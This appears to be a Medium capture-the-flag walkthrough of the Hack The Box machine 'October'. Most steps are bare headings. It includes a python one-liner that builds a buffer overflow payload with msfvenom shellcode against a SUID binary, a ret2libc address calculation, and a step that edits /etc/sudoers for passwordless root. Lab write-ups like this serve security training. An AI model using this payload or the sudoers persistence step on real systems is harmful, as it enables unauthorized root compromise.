October — HTB Walkthrough

ENUMERATION

Nmap Scan

Port 80 HTTP Enumeration

visiting website I found Login and register page
Backend folder found
Auth Page
We see we can upload malicious contents using any of these

EXPLOITATION

Uploading the file with changes told above.

Getting shell as www-data
Getting User.txt

PRIVILEGE ESCALATION

Looking for SUID

On target machine
On your machine
We receive a segmentation fault at 0x64413764
We find this at 112.
Checking value at EIP register, we see it is filled with Bs’
It hits

4) Shellcode

Using msfvenom we will create a shellcode

5) Sending payload

Using some padding we will send our shellcode and offset as a payload. For this we write shell.py

We see A is overwritten on EIP
python -c ‘offset = 112;shell=””;shell +=”\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +=”\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e”;shell +=”\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +=”\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab”;shell +=”\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +=”\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b”;shell +=”\x70\x39\xd4\xbf”;nop = “\x90”*(offset — len(shell));eip = “\xe4c\xfd\x95\xbf”;payload = nop + shell + eip;print(payload);’
ASLR was enabled
NX Enabled

Calculation

System: 0xb7582000+0x40310=0xB75C2310

Getting ROOT Flag

POST EXPLOITATION

Since we have privilege to open and modify a file as ROOT. We will add ourselves to /etc/sudoers , such that we don’t need any password to run sudo. And then running su to switch to ROOT

References :

[1]: https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.